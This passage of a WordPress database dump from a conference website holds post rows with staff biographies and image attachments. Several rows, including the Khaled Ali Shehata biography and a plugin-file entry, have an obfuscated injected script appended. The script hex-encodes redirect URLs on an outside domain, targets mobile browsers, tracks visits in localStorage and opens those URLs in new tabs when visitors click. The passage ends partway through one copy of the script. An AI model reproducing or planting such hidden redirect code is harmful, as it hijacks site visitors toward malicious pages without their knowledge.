_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Alaa M. Morsy','','publish','closed','closed','','prof-alaa-m-morsy','','','2023-04-02 06:55:09','2023-04-02 06:55:09','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3955',0,'dt_team','',0),
(3956,1,'2023-03-28 15:08:26','2023-03-28 15:08:26','','dr-alaa','','inherit','open','closed','','dr-alaa','','','2023-03-28 15:08:26','2023-03-28 15:08:26','',3955,'https://gsw2023.com/wp-content/uploads/2023/03/dr-alaa.bmp',0,'attachment','image/bmp',0),
(3957,1,'2022-03-28 15:09:50','2022-03-28 15:09:50','<!-- wp:paragraph -->\n<p><strong>KHALED Ali SHEHATA</strong> received the B.Sc. degree from the Military Technical College, Cairo, Egypt, in 1981, the M.Sc. degree from Cairo University, Egypt, in 1991, and the Ph.D. degree from the Naval Postgraduate School, Monterey, CA, USA, in 1996. He worked as a Research Assistant. He worked as a Researcher in Egypt and the Director of the VLSI Design Center, AOI, Egypt. He has been an assistant Professor in the College of Engineering, Cairo Campus, Arab Academy for Science and Technology, since 2000, then Associate Professor in 2002 and finally a full Professor in 2006. During his service in AASTMT he took the following responsibilities: Assistant Dean of College of Engineering for graduate studies in 2004, graduate studies department Chairman in 2008, Electronics and Communication Engineering Department Chairman in 2011, Vice Dean for Education in 2014 and finally Dean of the College in 2015 till 2020. In 2020 he was retired and assigned to be the AASTMT President consultant for Scientific research till now. His research interests include analog and digital VLSI design, and electronics and communications system design. He has more than 130 scientific research articles in these areas. He also holds two US Patents in VLSI Design.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. DR. KHALED Ali SHEHATA','','publish','closed','closed','','prof-dr-khaled-ali-shehata','','','2023-04-02 07:23:19','2023-04-02 07:23:19','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3957',0,'dt_team','',0),
(3958,1,'2023-03-28 15:10:56','2023-03-28 15:10:56','','dr-ayman_adel','','inherit','open','closed','','dr-ayman_adel','','','2023-03-28 15:10:56','2023-03-28 15:10:56','',3954,'https://gsw2023.com/wp-content/uploads/2023/03/dr-ayman_adel.bmp',0,'attachment','image/bmp',0),
(3959,1,'2023-03-28 15:11:57','2023-03-28 15:11:57','','dr-khaled','','inherit','open','closed','','dr-khaled','','','2023-03-28 15:11:57','2023-03-28 15:11:57','',3957,'https://gsw2023.com/wp-content/uploads/2023/03/dr-khaled.bmp',0,'attachment','image/bmp',0),
(3961,1,'2023-03-30 03:54:55','2023-03-30 03:54:55','https://gsw2023.com/wp-content/uploads/2023/03/codecanyon-eJrpSzBr-wpbakery-page-builder-for-wordpress.zip\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec3